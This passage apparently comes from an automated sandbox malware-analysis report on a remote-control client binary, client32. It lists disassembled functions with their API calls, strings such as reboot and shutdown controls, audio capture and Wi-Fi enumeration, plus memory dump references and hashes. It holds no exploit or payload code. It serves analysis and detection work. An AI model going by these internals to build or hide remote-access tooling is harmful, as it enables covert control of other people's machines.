                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$Leave$CreateEnterLibrary$AddressCloseEventExchangeFileFreeHandleInterlockedLoadProc__wcstoi64_calloc_free
                                                                                                                                                                                                    • String ID: Audio$DisableSounds$Error. Vista AudioCapture GetInstance ret %s$Error. Vista AddAudioCaptureEventListener ret %s$InitCaptureSounds NT6$Vista AddAudioCapEvtListener(%p)$Vista new pAudioCap=%p$\\.\NSAudioFilter
                                                                                                                                                                                                    • API String ID: 2005284756-2362500394
                                                                                                                                                                                                    • Opcode ID: 1b3ff62302edfe70963872ecb882b6fdc49eed430e431981be697212f47832f9
                                                                                                                                                                                                    • Instruction ID: 13704de1d539ef30c3066c3cc5484e22fa9722ec6e344ec07ec17af159e95cc0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1b3ff62302edfe70963872ecb882b6fdc49eed430e431981be697212f47832f9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A951D8B5E04A4AAFE714CF64DC80BAEF7E8FB04359F10467EE92993640E731765087A1
                                                                                                                                                                                                    Function 110F5510 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 158windowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                      • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                                                                                                    • ShowCursor.USER32(00000000), ref: 110F55DD
                                                                                                                                                                                                    • OpenEventA.KERNEL32(00100000,00000000,NSBlankExit), ref: 110F55EE
                                                                                                                                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,?,000000BF), ref: 110F5614
                                                                                                                                                                                                    • GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 110F5633
                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 110F5644
                                                                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 110F564D
                                                                                                                                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000BF), ref: 110F5661
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 110F5674
                                                                                                                                                                                                    • GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 110F568C
                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 110F56A7
                                                                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 110F56B0
                                                                                                                                                                                                    • GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 110F56BF
                                                                                                                                                                                                    • ShowCursor.USER32(00000001), ref: 110F56CD
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$CursorDispatchMultipleObjectsShowTranslateWait$CloseEventHandleOpen_memsetwsprintf
                                                                                                                                                                                                    • String ID: NSBlankExit
                                                                                                                                                                                                    • API String ID: 3602634875-773372720
                                                                                                                                                                                                    • Opcode ID: e68260c3a4de123fa72860ee07f86da7e712f847a20bfc2a252c0d5c7a084281
                                                                                                                                                                                                    • Instruction ID: 5ec7c1be67ca2a78862dc13c18a8ec745b66933f059b542a1e0c74ee0f1129a0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e68260c3a4de123fa72860ee07f86da7e712f847a20bfc2a252c0d5c7a084281
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 68513E76E4132EABDB10DF608C85FEDB7B8AB48704F1005A9E615D7184EB75AA40CF91
                                                                                                                                                                                                    Function 11103110 Relevance: 24.7, APIs: 9, Strings: 5, Instructions: 153COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 1110313E
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(111EC5C4), ref: 11103147
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 1110314D
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 111031A0
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(111EC5C4), ref: 111031A9
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 111031DA
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(111EC5C4), ref: 111031E3
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(111EC5C4), ref: 1110320C
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(111EC5C4,00000000,?,00000000), ref: 111032D3
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                      • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                                                                                                      • Part of subcall function 110EEA50: InitializeCriticalSection.KERNEL32(00000038,00000000,00000000,?,00000000,?,11103277,?), ref: 110EEA7B
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$CountTick$Leave$Enter$Initialize_memsetwsprintf
                                                                                                                                                                                                    • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock$e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp$info. new psi(%d) = %x$psi
                                                                                                                                                                                                    • API String ID: 3572004736-3013461081
                                                                                                                                                                                                    • Opcode ID: 2b14e68d4533465ca6ede4850a325a27a31b967f1298800cdcf78ff7dd429e77
                                                                                                                                                                                                    • Instruction ID: 751a9e08e7d07462896511fc241fa3711dcdedb17ea13ac702f7fc28ec4d2028
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b14e68d4533465ca6ede4850a325a27a31b967f1298800cdcf78ff7dd429e77
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9441F67AF04519AFCB11DFE59C85EEEFBB5AB44218B104525F905E7640EB306900CBA1
                                                                                                                                                                                                    Function 1103B020 Relevance: 24.6, APIs: 3, Strings: 11, Instructions: 140sleepwindowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 1103B15F
                                                                                                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 1103B1A4
                                                                                                                                                                                                    • PostMessageA.USER32(0007036E,00000010,00000000,00000000), ref: 1103B1CF
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CountMessagePostSleepTick
                                                                                                                                                                                                    • String ID: AssertOnReboot$CLTCONN.CPP$Client$DisableLogoff$DisablePowerOff$DisableReboot$DisableShutDown$FALSE || !"assertOnReboot"$GPFOnReboot$_debug$sd - Post WM_CLOSE to %08x
                                                                                                                                                                                                    • API String ID: 507213284-4185502373
                                                                                                                                                                                                    • Opcode ID: edb7ba95a0dbe671a8f45536223d8c402f036747e014dfae0fdba634982649ab
                                                                                                                                                                                                    • Instruction ID: f79ec28786b2f4c10a59bc50768d7a54d57fb70274f002d705909bb0de105b61
                                                                                                                                                                                                    • Opcode Fuzzy Hash: edb7ba95a0dbe671a8f45536223d8c402f036747e014dfae0fdba634982649ab
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 12412934F4065EBEE721CA529C85FBDB795ABC0B0DF5040A5FE247E2C0EB60B4408355
                                                                                                                                                                                                    Function 11157010 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 94libraryloaderCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                      • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(wlanapi.dll,?,11057147), ref: 1115705B
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,WlanOpenHandle), ref: 11157074
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,WlanCloseHandle), ref: 11157084
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,WlanEnumInterfaces), ref: 11157094
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,WlanGetAvailableNetworkList), ref: 111570A4
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,WlanFreeMemory), ref: 111570B4
                                                                                                                                                                                                    • std::exception::exception.LIBCMT ref: 111570CD
                                                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 111570E2
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc$Exception@8LibraryLoadThrow_memsetstd::exception::exceptionwsprintf
                                                                                                                                                                                                    • String ID: WlanCloseHandle$WlanEnumInterfaces$WlanFreeMemory$WlanGetAvailableNetworkList$WlanOpenHandle$wlanapi.dll
                                                                                                                                                                                                    • API String ID: 1463381176-1736626566
                                                                                                                                                                                                    • Opcode ID: 883de4db6132f92fd2791c3658098a597c0006997dfe857d44e8fbfa8cff4122
                                                                                                                                                                                                    • Instruction ID: caad9b3ffb412b0ce201366128ee2238a993313849ab4ce7a7f1ca44c3893492
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 883de4db6132f92fd2791c3658098a597c0006997dfe857d44e8fbfa8cff4122
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6521E1B5A01718AFC751EFADCD809ABFBF9AF58204700C92AE469C3301E670E401CF91
                                                                                                                                                                                                    Function 1111D480 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1111B6C0: SelectPalette.GDI32(?,?,00000000), ref: 1111B73C
                                                                                                                                                                                                      • Part of subcall function 1111B6C0: SelectPalette.GDI32(?,?,00000000), ref: 1111B751
                                                                                                                                                                                                      • Part of subcall function 1111B6C0: DeleteObject.GDI32(?), ref: 1111B764
                                                                                                                                                                                                      • Part of subcall function 1111B6C0: DeleteObject.GDI32(?), ref: 1111B771
                                                                                                                                                                                                      • Part of subcall function 1111B6C0: DeleteObject.GDI32(?), ref: 1111B796
                                                                                                                                                                                                    • _free.LIBCMT ref: 1111D49D
                                                                                                                                                                                                      • Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
                                                                                                                                                                                                      • Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD
                                                                                                                                                                                                    • _free.LIBCMT ref: 1111D4B3
                                                                                                                                                                                                    • _free.LIBCMT ref: 1111D4C8
                                                                                                                                                                                                    • GdiFlush.GDI32(?,?,?,00728E08), ref: 1111D4D0
                                                                                                                                                                                                    • _free.LIBCMT ref: 1111D4DD
                                                                                                                                                                                                    • _free.LIBCMT ref: 1111D4F1
                                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 1111D50D
                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 1111D51A
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,00728E08), ref: 1111D524
                                                                                                                                                                                                    • DeleteDC.GDI32(?), ref: 1111D54B
                                                                                                                                                                                                    • ReleaseDC.USER32(?,?), ref: 1111D55E
                                                                                                                                                                                                    • DeleteDC.GDI32(?), ref: 1111D56B
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(111E59C8), ref: 1111D578
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Error deleting membm, e=%d, xrefs: 1111D52B
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Delete$Object_free$Select$ErrorLastPalette$DecrementFlushFreeHeapInterlockedRelease
                                                                                                                                                                                                    • String ID: Error deleting membm, e=%d
                                                                                                                                                                                                    • API String ID: 3195047866-709490903
                                                                                                                                                                                                    • Opcode ID: 9c2adf2ed169df4d317d6cc21ab7cd28a5f95e7760aa942516609c3df0eba2e1
                                                                                                                                                                                                    • Instruction ID: 8035f785c448485e0a0b583a16257735e59db1fe9725df5791180d2e2a6c23f4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c2adf2ed169df4d317d6cc21ab7cd28a5f95e7760aa942516609c3df0eba2e1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D2147B5500B029BD2919F75D8D8AAFF7F4EF89308F10491DE6AA87204DB34B541CF62
                                                                                                                                                                                                    Function 11027130 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 174windowlibraryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D
                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(PCIRES,00000000,00000000), ref: 110271C0
                                                                                                                                                                                                    • LoadIconA.USER32(00000000,00007D0B), ref: 110271D5
                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000032), ref: 110271EE
                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000031), ref: 110271F3
                                                                                                                                                                                                    • LoadImageA.USER32(00000000,00007D0B,00000001,00000000), ref: 11027203
                                                                                                                                                                                                    • LoadIconA.USER32(11000000,00000491), ref: 1102721B
                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000032), ref: 1102722A
                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000031), ref: 1102722F
                                                                                                                                                                                                    • LoadImageA.USER32(11000000,00000491,00000001,00000000), ref: 11027240
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Load$MetricsSystem$IconImage$Library__wcstoi64
                                                                                                                                                                                                    • String ID: AdminUserAcknowledge$PCIRES$_License$product
                                                                                                                                                                                                    • API String ID: 1946015-1270847556
                                                                                                                                                                                                    • Opcode ID: b5081cdd9087fe896703f36cdb24c0bbd67552c611d9c1bb16947e5bd2980717
                                                                                                                                                                                                    • Instruction ID: 7d40fe3dfb7a436b35654b91f1e6e13152f39ea3f8258807fefd6660e2433123
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b5081cdd9087fe896703f36cdb24c0bbd67552c611d9c1bb16947e5bd2980717
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 00513775F40B176BEB11CAA48C81F6FB6AD9F55708F504025FE05E7281EB70E904C7A2
                                                                                                                                                                                                    Function 687E6AA1 Relevance: 22.7, APIs: 15, Instructions: 234stringCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___crtGetStringTypeA.LIBCMT ref: 687E69B7
                                                                                                                                                                                                    • memcmp.MSVCR100(?,000000FE), ref: 687E6A74
                                                                                                                                                                                                    • _getptd.MSVCR100(00000001,00000000), ref: 687E6AC9
                                                                                                                                                                                                      • Part of subcall function 687E50C1: _getptd.MSVCR100(00000000,00000000,00000005), ref: 687E50F7
                                                                                                                                                                                                      • Part of subcall function 687E50C1: strcpy_s.MSVCR100(00000000,00000000,687E51A0,00000000,00000000,00000005), ref: 687E5165
                                                                                                                                                                                                    • strcmp.MSVCR100(?,?,?,?,?,?,00000001,00000000), ref: 687E6B10
                                                                                                                                                                                                    • _strlen.LIBCMT(?,?,?,?,?,00000001,00000000), ref: 687E6B26
